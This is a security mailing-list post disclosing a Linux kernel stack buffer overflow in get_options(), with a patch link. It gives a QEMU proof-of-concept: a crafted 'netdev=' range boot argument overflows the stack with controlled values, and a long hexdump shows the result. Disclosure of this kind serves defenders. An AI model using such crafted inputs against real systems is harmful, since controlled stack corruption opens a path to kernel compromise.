oss-sec mailing list archives
Linux kernel: stack buffer overflow with controlled payload in get_options() function
From: Ilya Matveychikov <matvejchikov () gmail com>
Date: Tue, 30 May 2017 08:17:54 +0400
Hello, I’ve found the bug in get_options() function which is used for parsing kernel’s cmdline string. The bug is similar to CVE-2017-1000363 described by Roee Hay (https://alephsecurity.com/vulns/aleph-2017023). Details ======= When using get_options() it's possible to specify a range of numbers, like 1-100500. The problem is that it doesn't track array size while calling internally to get_range() which iterates over the range and fills the memory with numbers. Given that one can use “netdev=min-max” option to cause stack overflow with controlled payload. Here are some simple steps to reproduce the problem in QEMU-based virtual environment: 1) Run kernel in QEMU and wait for system halt: $ qemu-system-x86_64 -no-reboot -no-shutdown -kernel \ /boot/vmlinuz-4.4.0-66-generic -append "netdev=3735928559-3735999999" 2) After the system halt enter in QEMU console by pressing Ctrl-Alt-2 and dump all the guest's machine memory: compat_monitor0 console QEMU 2.5.0 monitor - type 'help' for more information (qemu) dump-gest-memory dump <ENTER> (qemu) quit <ENTER> 3) Look for pair of magic numbers (deadbeef,deadbef0) in "dump" file: $ hexdump -C dump | grep "ef be ad de f0 be ad de" 01de42e0 ef be ad de f0 be ad de f1 be ad de f2 be ad de |................| 4) Follow address <01de42e0> in hexdump: 01de42e0 ef be ad de f0 be ad de f1 be ad de f2 be ad de |................| 01de42f0 f3 be ad de f4 be ad de f5 be ad de f6 be ad de |................| 01de4300 f7 be ad de f8 be ad de f9 be ad de fa be ad de |................| 01de4310 fb be ad de fc be ad de fd be ad de fe be ad de |................| 01de4320 ff be ad de 00 bf ad de 01 bf ad de 02 bf ad de |................| 01de4330 03 bf ad de 04 bf ad de 05 bf ad de 06 bf ad de |................| 01de4340 07 bf ad de 08 bf ad de 09 bf ad de 0a bf ad de |................| 01de4350 0b bf ad de 0c bf ad de 0d bf ad de 0e bf ad de |................| 01de4360 0f bf ad de 10 bf ad de 11 bf ad de 12 bf ad de |................| 01de4370 13 bf ad de 14 bf ad de 15 bf ad de 16 bf ad de |................| 01de4380 17 bf ad de 18 bf ad de 19 bf ad de 1a bf ad de |................| 01de4390 1b bf ad de 1c bf ad de 1d bf ad de 1e bf ad de |................| 01de43a0 1f bf ad de 20 bf ad de 21 bf ad de 22 bf ad de |.... ...!..."...| 01de43b0 23 bf ad de 24 bf ad de 25 bf ad de 26 bf ad de |#...$...%...&...| 01de43c0 27 bf ad de 28 bf ad de 29 bf ad de 2a bf ad de |'...(...)...*...| 01de43d0 2b bf ad de 2c bf ad de 2d bf ad de 2e bf ad de |+...,...-.......| 01de43e0 2f bf ad de 30 bf ad de 31 bf ad de 32 bf ad de |/...0...1...2...| 01de43f0 33 bf ad de 34 bf ad de 35 bf ad de 36 bf ad de |3...4...5...6...| 01de4400 37 bf ad de 38 bf ad de 39 bf ad de 3a bf ad de |7...8...9...:...| 01de4410 3b bf ad de 3c bf ad de 3d bf ad de 3e bf ad de |;...<...=...>...| 01de4420 3f bf ad de 40 bf ad de 41 bf ad de 42 bf ad de |?...@...A...B...| 01de4430 43 bf ad de 44 bf ad de 45 bf ad de 46 bf ad de |C...D...E...F...| 01de4440 47 bf ad de 48 bf ad de 49 bf ad de 4a bf ad de |G...H...I...J...| 01de4450 4b bf ad de 4c bf ad de 4d bf ad de 4e bf ad de |K...L...M...N...| 01de4460 4f bf ad de 50 bf ad de 51 bf ad de 52 bf ad de |O...P...Q...R...| 01de4470 53 bf ad de 54 bf ad de 55 bf ad de 56 bf ad de |S...T...U...V...| 01de4480 57 bf ad de 58 bf ad de 59 bf ad de 5a bf ad de |W...X...Y...Z...| 01de4490 5b bf ad de 5c bf ad de 5d bf ad de 5e bf ad de |[...\...]...^...| 01de44a0 5f bf ad de 60 bf ad de 61 bf ad de 62 bf ad de |_...`...a...b...| 01de44b0 63 bf ad de 64 bf ad de 65 bf ad de 66 bf ad de |c...d...e...f...| 01de44c0 67 bf ad de 68 bf ad de 69 bf ad de 6a bf ad de |g...h...i...j...| 01de44d0 6b bf ad de 6c bf ad de 6d bf ad de 6e bf ad de |k...l...m...n...| 01de44e0 6f bf ad de 70 bf ad de 71 bf ad de 72 bf ad de |o...p...q...r...| 01de44f0 73 bf ad de 74 bf ad de 75 bf ad de 76 bf ad de |s...t...u...v...| 01de4500 77 bf ad de 78 bf ad de 79 bf ad de 7a bf ad de |w...x...y...z...| 01de4510 7b bf ad de 7c bf ad de 7d bf ad de 7e bf ad de |{...|...}...~...| 01de4520 7f bf ad de 80 bf ad de 81 bf ad de 82 bf ad de |................| 01de4530 83 bf ad de 84 bf ad de 85 bf ad de 86 bf ad de |................| 01de4540 87 bf ad de 88 bf ad de 89 bf ad de 8a bf ad de |................| 01de4550 8b bf ad de 8c bf ad de 8d bf ad de 8e bf ad de |................| ... The patch for the bug was submitted by me to LKML list recently: https://lkml.org/lkml/2017/5/22/581 This was reported to security () kernel org, also. Ilya Matveychikov
Current thread:
- Linux kernel: stack buffer overflow with controlled payload in get_options() function Ilya Matveychikov (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Simon McVittie (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Daniel Micay (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Florian Weimer (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Daniel Micay (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Florian Weimer (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Daniel Micay (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Florian Weimer (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Daniel Micay (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Daniel Micay (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Daniel Micay (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Simon McVittie (May 30)
- Re: Linux kernel: stack buffer overflow with controlled payload in get_options() function Daniel Micay (May 30)